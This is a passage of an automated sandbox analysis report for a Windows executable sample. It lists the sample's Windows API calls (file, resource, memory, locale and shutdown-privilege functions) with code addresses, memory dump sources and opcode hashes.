                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                          • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                          • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                          • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                          • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID:
                                                                          • API String ID: 442123175-0
                                                                          • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                          • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                          • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                          • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                          • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                          • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                          • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,02088000,00409F6B,00000000), ref: 00407613
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                          • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                          • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                          • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                          • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                          • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                          • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                          • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                          • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                          • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrev
                                                                          • String ID:
                                                                          • API String ID: 122130370-0
                                                                          • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                          • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                          • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                          • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                          • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                          • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                          • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                          • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                          • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                          • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                          • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                          • Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
                                                                          • Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                          • Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                          • Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
                                                                          • Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                          • Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                          • Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
                                                                          • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                          • Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                          • Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
                                                                          • Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                          • Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                          • Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
                                                                          • Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                          • Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
